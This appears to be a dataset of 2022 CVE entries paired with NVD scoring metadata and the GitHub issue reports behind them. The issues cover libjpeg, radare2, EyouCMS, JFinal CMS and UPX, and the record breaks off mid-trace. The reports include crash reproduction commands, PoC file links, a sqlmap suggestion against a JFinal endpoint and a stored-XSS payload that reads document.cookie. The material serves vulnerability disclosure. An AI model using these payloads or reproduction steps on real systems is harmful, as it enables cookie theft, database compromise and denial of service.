version: latest commit 14bf94c poc: [poc.zip](https://github.com/thorfdbg/libjpeg/files/9191143/poc.zip) command: ./jpeg poc /dev/null The backtrace in gdb: ``` (gdb) bt #0 ByteStream::Get (this=0x790ae0) at bytestream.cpp:223 #1 0x000000000042331e in IOStream::PeekWord (this=0x790ae0) at iostream.cpp:543 #2 0x00000000004c38d5 in Frame::ParseTrailer (this=0x792590, io=0x790ae0) at frame.cpp:1018 #3 0x000000000043aac9 in JPEG::ReadInternal (this=0x7904c8, tags=0x7fffffffdd50) at jpeg.cpp:332 #4 0x000000000043988b in JPEG::Read (this=0x7904c8, tags=0x7fffffffdd50) at jpeg.cpp:210 #5 0x000000000041cabb in Reconstruct (infile=<optimized out>, outfile=0x7fffffffe70c "/dev/null", colortrafo=1, alpha=0x0, upsample=true) at reconstruct.cpp:121 #6 0x0000000000408b6a in main (argc=<optimized out>, argv=0x790f29) at main.cpp:747 ``` **Root cause:** There is a loop in frame.cpp:1017-1118. In line 1018, the program continuously reads `marker` in the stream by calling `IOStream::PeekWord()` function. https://github.com/thorfdbg/libjpeg/blob/842c7baef7808f12cad19b49b2efcfa9575dbc78/marker/frame.cpp#L1018 In cases of the `default` branch, the loop won't exit. https://github.com/thorfdbg/libjpeg/blob/842c7baef7808f12cad19b49b2efcfa9575dbc78/marker/frame.cpp#L1088-L1117 The problem is that the `IOStream::PeekWord()` function might always return a same value. Specifically, the `IOStream::PeekWord()` calls `ByteStream::Get()`. https://github.com/thorfdbg/libjpeg/blob/91985dc031428f8a7cf90af5e22e234f1f529611/io/bytestream.cpp#L214-L224 `IOStream::PeekWord()` returns at line 223 with `m_pucBufPtr++`. However, when using gdb to check the value of `m_pucBufPtr`, I found that the ByteStream::Get() functions repeatedly read the values from the same address. The 0x790f2a and 0x790f29 correspond to `byte1` and `byte2` in `IOStream::PeekWord()` and they never change. <img width="567" alt="Screen Shot 2022-07-26 at 23 54 05" src="https://user-images.githubusercontent.com/70422882/181052728-ee1cbd37-184d-4c75-9dce-6c7cbca25092.png"> `IOStream::PeekWord()` then always returns a same value (calculated by `byte1` and `byte2`). Finally, the program never terminates because the return value forces the program to take the `default` branch.
Infinite loop in Frame::ParseTrailer
https://api.github.com/repos/thorfdbg/libjpeg/issues/77/comments
1
2022-07-26T15:59:16Z
2022-08-03T12:22:36Z
https://github.com/thorfdbg/libjpeg/issues/77
1,318,449,876
77
CVE-2022-37769
2022-08-18T20:15:12.013
libjpeg commit 281daa9 was discovered to contain a segmentation fault via HuffmanDecoder::Get at huffmandecoder.hpp. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/78" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpeg:libjpeg:-:*:*:*:*:*:*:*", "matchCriteriaId": "43E4B6B8-F045-4BF3-AC73-8F5596EA703C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/thorfdbg/libjpeg/issues/78
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thorfdbg", "libjpeg" ]
Hi, there. There is a segmentation fault in the newest master branch. Here is the reproducing command: `jpeg poc /dev/null` ``` Program received signal SIGSEGV, Segmentation fault. HuffmanDecoder::Get (this=0x0, io=0x7933c8) at /home/users/chluo/libjpeg/codestream/../coding/huffmandecoder.hpp:112 warning: Source file is more recent than executable. (gdb) bt #0 HuffmanDecoder::Get (this=0x0, io=0x7933c8) at /home/users/chluo/libjpeg/codestream/../coding/huffmandecoder.hpp:112 #1 0x0000000000491388 in LosslessScan::ParseMCU (this=0x793250, prev=0x7fffffffda90, top=0x7fffffffda70) at losslessscan.cpp:374 #2 0x0000000000491b4a in LosslessScan::ParseMCU (this=0x793250) at losslessscan.cpp:440 #3 0x000000000043aca1 in JPEG::ReadInternal (this=0x7904c8, tags=0x7fffffffdd40) at jpeg.cpp:345 #4 0x000000000043988b in JPEG::Read (this=0x7904c8, tags=0x7fffffffdd40) at jpeg.cpp:210 #5 0x000000000041cabb in Reconstruct (infile=<optimized out>, outfile=0x7fffffffe6fc "/dev/null", colortrafo=1, alpha=0x0, upsample=true) at reconstruct.cpp:121 #6 0x0000000000408b6a in main (argc=<optimized out>, argv=0x0) at main.cpp:747 ``` [poc.zip](https://github.com/thorfdbg/libjpeg/files/9194930/poc.zip)
Segmentation fault in HuffmanDecoder::Get
https://api.github.com/repos/thorfdbg/libjpeg/issues/78/comments
1
2022-07-27T04:04:02Z
2022-08-03T12:23:15Z
https://github.com/thorfdbg/libjpeg/issues/78
1,318,990,797
78
CVE-2022-37770
2022-08-18T20:15:12.060
libjpeg commit 281daa9 was discovered to contain a segmentation fault via LineMerger::GetNextLowpassLine at linemerger.cpp. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/thorfdbg/libjpeg/issues/79" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jpeg:libjpeg:-:*:*:*:*:*:*:*", "matchCriteriaId": "43E4B6B8-F045-4BF3-AC73-8F5596EA703C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/thorfdbg/libjpeg/issues/79
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "thorfdbg", "libjpeg" ]
Hi, there. There is a segmentation fault in the newest master branch. Here is the reproducing command: `jpeg poc /dev/null` ``` (gdb) bt #0 0x00007ffff7f31270 in ?? () from /lib/x86_64-linux-gnu/libc.so.6 #1 0x0000000000711b6f in LineMerger::GetNextLowpassLine (this=0x85ed20, comp=2 '\002') at linemerger.cpp:262 #2 0x00000000007127d2 in LineMerger::GetNextExpandedLowPassLine (this=0x85ed20, comp=<optimized out>) at linemerger.cpp:339 #3 0x0000000000713251 in LineMerger::GetNextLine (this=0x85ed20, comp=2 '\002') at linemerger.cpp:360 #4 0x000000000071c2dd in HierarchicalBitmapRequester::Pull8Lines (this=0x792720, c=<optimized out>) at hierarchicalbitmaprequester.cpp:447 #5 0x0000000000720156 in HierarchicalBitmapRequester::ReconstructRegion (this=0x792720, orgregion=..., rr=0x7fffffffdae8) at hierarchicalbitmaprequester.cpp:739 #6 0x000000000045c501 in Image::ReconstructRegion (this=0x7923b0, bmh=0x7fffffffd790, rr=0x7fffffffdae8) at image.cpp:1115 #7 0x000000000043e266 in JPEG::InternalDisplayRectangle (this=0x7904c8, tags=0x7fffffffde90) at jpeg.cpp:721 #8 0x000000000043e14b in JPEG::DisplayRectangle (this=0x7904c8, tags=0x7fffffffde90) at jpeg.cpp:699 #9 0x000000000041e336 in Reconstruct (infile=<optimized out>, outfile=0x7fffffffe704 "/dev/null", colortrafo=1, alpha=0x790280 "\230$\255", <incomplete sequence \373>, upsample=true) at reconstruct.cpp:331 #10 0x0000000000408b6a in main (argc=<optimized out>, argv=0x87a720) at main.cpp:747 ``` [poc.zip](https://github.com/thorfdbg/libjpeg/files/9249613/poc.zip)
Segmentation fault in LineMerger::GetNextLowpassLine
https://api.github.com/repos/thorfdbg/libjpeg/issues/79/comments
3
2022-07-28T04:17:56Z
2022-08-03T12:22:57Z
https://github.com/thorfdbg/libjpeg/issues/79
1,320,369,822
79
CVE-2022-36225
2022-08-19T17:15:07.897
EyouCMS V1.5.8-UTF8-SP1 is vulnerable to Cross Site Request Forgery (CSRF) via the background, column management function and add.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/26" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.5.8:*:*:*:*:*:*:*", "matchCriteriaId": "82E421EB-ECC8-42A4-8384-4187474D1AC3", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/weng-xianhu/eyoucms/issues/26
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
version:V1.5.8-UTF8-SP1 ![image](https://user-images.githubusercontent.com/60609675/179399541-843e2a44-61d4-47b1-a174-97e975e03452.png) In the background, column management function and add. ![image](https://user-images.githubusercontent.com/60609675/179399615-1abe143b-0165-43f6-8738-7d16c06c1637.png) Add test data and capture packets. ![image](https://user-images.githubusercontent.com/60609675/179399634-59449baa-e24e-4d7a-84e5-9ca0293f7e36.png) ![image](https://user-images.githubusercontent.com/60609675/179399670-c697287e-cb05-410c-8521-4f4e84783ff0.png) use CSRF poc,and drop the packets. ![image](https://user-images.githubusercontent.com/60609675/179399733-a6562ba4-8d4a-441d-8637-fe7f3a45e3fd.png) dorp the packets and submit. ![image](https://user-images.githubusercontent.com/60609675/179399776-e4475f20-9970-476b-9ac4-16d9b6436654.png) ![image](https://user-images.githubusercontent.com/60609675/179399794-2b8dc544-d6d7-43b5-b957-2e65bf0be254.png) See test added. ![image](https://user-images.githubusercontent.com/60609675/179399839-db85f945-909f-4282-a965-b71d70104902.png)
EyouCMS v1.5.8 has a vulnerability, Cross-site request forgery(CSRF)
https://api.github.com/repos/weng-xianhu/eyoucms/issues/26/comments
2
2022-07-17T13:08:03Z
2023-02-28T08:54:23Z
https://github.com/weng-xianhu/eyoucms/issues/26
1,307,093,003
26
CVE-2020-27793
2022-08-19T23:15:08.367
An off-by-one overflow flaw was found in radare2 due to mismatched array length in core_java.c. This could allow an attacker to cause a crash, and perform a denail of service attack.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/commit/ced0223c7a1b3b5344af315715cd28fe7c0d9ebc" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/16304" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "EEE8DA49-FB7A-4416-8942-56DD67E62CD9", "versionEndExcluding": "4.4.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/radareorg/radare2/issues/16304
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "radareorg", "radare2" ]
### Work environment | Questions | Answers |------------------------------------------------------|-------------------- | OS/arch/bits (mandatory) | Ubuntu x86 64 | File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory) | x86/64 | r2 -v full output, **not truncated** (mandatory) | rradare2 4.3.1 23909 @ linux-x86-64 git.4.3.1-1-ge55661b commit: e55661bd4c229b9095982675709bdd52e1b4c068 build: 2020-03-22__22:18:20 ### Expected behavior Handle input error ### Actual behavior seg fault ### Steps to reproduce the behavior $ r2 - [0x00000000]> java 0 Segmentation fault (core dumped) ### Additional Logs, screenshots, source-code, configuration dump, ... ![image](https://user-images.githubusercontent.com/20163299/77502165-0289f700-6e95-11ea-9e63-c1b0fa9d6039.png) in `core_java.c`, `END_CMDS` not match the actual length in `JAVA_CMDS`
unmatched array length in core_java.c
https://api.github.com/repos/radareorg/radare2/issues/16304/comments
1
2020-03-25T04:35:41Z
2020-03-26T11:02:44Z
https://github.com/radareorg/radare2/issues/16304
587,435,992
16,304
CVE-2020-27794
2022-08-19T23:15:08.427
A double free issue was discovered in radare2 in cmd_info.c:cmd_info(). Successful exploitation could lead to modification of unexpected memory locations and potentially causing a crash.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/commit/cb8b683758edddae2d2f62e8e63a738c39f92683" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/16303" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "EEE8DA49-FB7A-4416-8942-56DD67E62CD9", "versionEndExcluding": "4.4.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/radareorg/radare2/issues/16303
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "radareorg", "radare2" ]
### Work environment | Questions | Answers |------------------------------------------------------|-------------------- | OS/arch/bits (mandatory) | Ubuntu x86 64 | File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory) | x86/64 | r2 -v full output, **not truncated** (mandatory) | rradare2 4.3.1 23909 @ linux-x86-64 git.4.3.1-1-ge55661b commit: e55661bd4c229b9095982675709bdd52e1b4c068 build: 2020-03-22__22:18:20 ### Expected behavior Handle input error ### Actual behavior double free/invalid pointer to free ### Steps to reproduce the behavior $ r2 - [0x00000000]> in 0 [0x00000000]> oc 0 [0x00000000]> in 0 *** Error in `r2': free(): invalid pointer: 0x00007fffed1bcd00 *** …… ### Additional Logs, screenshots, source-code, configuration dump, ... ![image](https://user-images.githubusercontent.com/20163299/77501626-880ca780-6e93-11ea-8669-48362438f409.png) The `in` command would first free the original `core->table_query`, then create a new `core->table_query` in `cmd_info.c:cmd_info()`, ``` R_FREE (core->table_query); if (space && *space == ' ') { core->table_query = r_str_trim_dup (space + 1); } ``` The `oc` command would free it in `core.c: r_core_fini`, which didn't NULL it out. ``` …… free (c->table_query); r_list_free (c->files); r_list_free (c->watchers); r_list_free (c->scriptstack); …… ``` So execute `in 0` again would cause a double/invalid free.
invalid free in cmd_info.c:cmd_info()
https://api.github.com/repos/radareorg/radare2/issues/16303/comments
1
2020-03-25T04:31:50Z
2020-03-26T11:28:51Z
https://github.com/radareorg/radare2/issues/16303
587,434,855
16,303
CVE-2020-27795
2022-08-19T23:15:08.487
A segmentation fault was discovered in radare2 with adf command. In libr/core/cmd_anal.c, when command "adf" has no or wrong argument, anal_fcn_data (core, input + 1) --> RAnalFunction *fcn = r_anal_get_fcn_in (core->anal, core->offset, -1); returns null pointer for fcn causing segmentation fault later in ensure_fcn_range (fcn).
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/commit/4d3811681a80f92a53e795f6a64c4b0fc2c8dd22" }, { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/16215" }, { "source": "[email protected]", "tags": [ "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/pull/16230" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "EEE8DA49-FB7A-4416-8942-56DD67E62CD9", "versionEndExcluding": "4.4.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/radareorg/radare2/issues/16215
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "radareorg", "radare2" ]
### Work environment | Questions | Answers |------------------------------------------------------|-------------------- | OS/arch/bits (mandatory) | Ubuntu x86 64 | File format of the file you reverse (mandatory) | ELF | Architecture/bits of the file (mandatory) | x86/64 | r2 -v full output, **not truncated** (mandatory) | radare2 4.3.1 23928 @ linux-x86-64 git.4.3.1-10-g1271d65 commit: 1271d653c7691047284a1de99d209972e3cee6d9 build: 2020-03-11__10:01:54 ### Expected behavior Handle input error ### Actual behavior Segmentation fault ### Steps to reproduce the behavior $ r2 - [0x00000000]> adf Segmentation fault (core dumped) ### Additional Logs, screenshots, source-code, configuration dump, ... ![image](https://user-images.githubusercontent.com/20163299/76677632-888f7d80-660b-11ea-922b-2ac18657b465.png) in `libr/core/anal.c`, when command "adf" has no or wrong argument, `anal_fcn_data (core, input + 1)` --> `RAnalFunction *fcn = r_anal_get_fcn_in (core->anal, core->offset, -1);` returns null pointer for `fnc` cause segmentation fault later in `ensure_fcn_range (fcn);`
command "adf" Segmentation fault
https://api.github.com/repos/radareorg/radare2/issues/16215/comments
1
2020-03-14T07:54:59Z
2020-03-16T16:03:23Z
https://github.com/radareorg/radare2/issues/16215
581,094,359
16,215
CVE-2022-37199
2022-08-23T13:15:08.520
JFinal CMS 5.1.0 is vulnerable to SQL Injection via /jfinal_cms/system/user/list.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/48" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jflyfox/jfinal_cms/issues/48
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jflyfox", "jfinal_cms" ]
the route is /jfinal_cms/system/user/list ![c1c9859cc9ea5015f05f68e55fb3695](https://user-images.githubusercontent.com/56295743/181653646-721d4a24-6e65-4ccc-ac85-6bdf49eb4068.jpg) ![f6d64fe8a0e68451dd7a70a0e7d98fb](https://user-images.githubusercontent.com/56295743/181653653-437648a8-c76d-495d-b1ae-2cdf5ca970fb.png) ![6e1b77dfc081f4433ae57e0d788738c](https://user-images.githubusercontent.com/56295743/181653662-e6277d38-1471-419a-b694-72365439f467.png)
There is a SQL injection vulnerability exists in JFinal CMS 5.1.0
https://api.github.com/repos/jflyfox/jfinal_cms/issues/48/comments
0
2022-07-28T23:30:08Z
2022-07-28T23:30:08Z
https://github.com/jflyfox/jfinal_cms/issues/48
1,321,592,019
48
CVE-2022-37223
2022-08-23T14:15:08.633
JFinal CMS 5.1.0 is vulnerable to SQL Injection via /jfinal_cms/system/role/list.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/49" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jflyfox/jfinal_cms/issues/49
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jflyfox", "jfinal_cms" ]
you can use the route /jfinal_cms/system/role/list then use sqlmap attack the interface like this : ![f097bb66a1e76ef93f3834b319a6b30](https://user-images.githubusercontent.com/56295743/181655295-926a52dc-37c0-4f99-81df-64acd5806af2.jpg)
There is a SQL injection vulnerability exists in JFinal CMS 5.1.0 again
https://api.github.com/repos/jflyfox/jfinal_cms/issues/49/comments
0
2022-07-28T23:48:08Z
2022-07-28T23:48:08Z
https://github.com/jflyfox/jfinal_cms/issues/49
1,321,600,614
49
CVE-2022-36527
2022-08-25T19:15:08.483
Jfinal CMS v5.1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the post title text field under the publish blog module.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/jflyfox/jfinal_cms/issues/45" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:jflyfox:jfinal_cms:5.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "9B33E946-BD15-449C-B736-013773A64DF6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/jflyfox/jfinal_cms/issues/45
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "jflyfox", "jfinal_cms" ]
There is a stored XSS vulnerability in JFinal_cms 's publish blog module. An attacker could insert malicious XSS code into the post title. When users and administrators view the blog post, the malicious XSS code is triggered successfully. First register a user to test it, then go to the submit blog post page and insert the malicious XSS code in the subject field Payload : `test1" onmouseover="alert(document.cookie)` ![202207181054488](https://user-images.githubusercontent.com/58295122/179446195-1986fe5b-e79f-4ce8-b472-aba00ccde3ca.png) Successfully executed malicious XSS code: ![202207181100094](https://user-images.githubusercontent.com/58295122/179446206-a881f5d2-82c6-430c-8d3e-a6ebacfb3676.png)
XSS vulnerability1 in jfinal_cms 5.1.0
https://api.github.com/repos/jflyfox/jfinal_cms/issues/45/comments
0
2022-07-18T04:43:11Z
2022-07-18T04:43:11Z
https://github.com/jflyfox/jfinal_cms/issues/45
1,307,399,442
45
CVE-2020-27796
2022-08-25T20:15:08.487
A heap-based buffer over-read was discovered in the invert_pt_dynamic function in p_lx_elf.cpp in UPX 4.0.0 via a crafted Mach-O file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 5.9, "source": "[email protected]", "type": "Primary" } ] }
[ { "source": "[email protected]", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/upx/upx/issues/392" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:upx_project:upx:4.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "D3527302-7874-4400-B123-99C1CA6FE8EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/upx/upx/issues/392
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "upx", "upx" ]
Author: giantbranch of NSFOCUS Security Team ## What's the problem (or question)? A heap buffer overflow in the latest commit of the devel branch ASAN reports: ``` ==21202==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x62f00000c530 at pc 0x00000058b076 bp 0x7ffdc9ecf670 sp 0x7ffdc9ecf668 READ of size 4 at 0x62f00000c530 thread T0 #0 0x58b075 in PackLinuxElf32::invert_pt_dynamic(N_Elf::Dyn<N_Elf::ElfITypes<LE16, LE32, LE32, LE32, LE32> > const*) /src/upx-multi/src/p_lx_elf.cpp:1676:25 #1 0x588959 in PackLinuxElf32::PackLinuxElf32help1(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:305:13 #2 0x5d5e74 in PackLinuxElf32Le::PackLinuxElf32Le(InputFile*) /src/upx-multi/src/./p_lx_elf.h:395:9 #3 0x5d5e74 in PackLinuxElf32x86::PackLinuxElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4838:54 #4 0x5d6261 in PackBSDElf32x86::PackBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4855:50 #5 0x5d6261 in PackFreeBSDElf32x86::PackFreeBSDElf32x86(InputFile*) /src/upx-multi/src/p_lx_elf.cpp:4866:58 #6 0x6e4460 in PackMaster::visitAllPackers(Packer* (*)(Packer*, void*), InputFile*, options_t const*, void*) /src/upx-multi/src/packmast.cpp:190:9 #7 0x6e8ff1 in PackMaster::getUnpacker(InputFile*) /src/upx-multi/src/packmast.cpp:248:18 #8 0x6e8ff1 in PackMaster::unpack(OutputFile*) /src/upx-multi/src/packmast.cpp:266:9 #9 0x75826b in do_one_file(char const*, char*) /src/upx-multi/src/work.cpp:160:12 #10 0x7597c2 in do_files(int, int, char**) /src/upx-multi/src/work.cpp:271:13 #11 0x555aed in main /src/upx-multi/src/main.cpp:1538:5 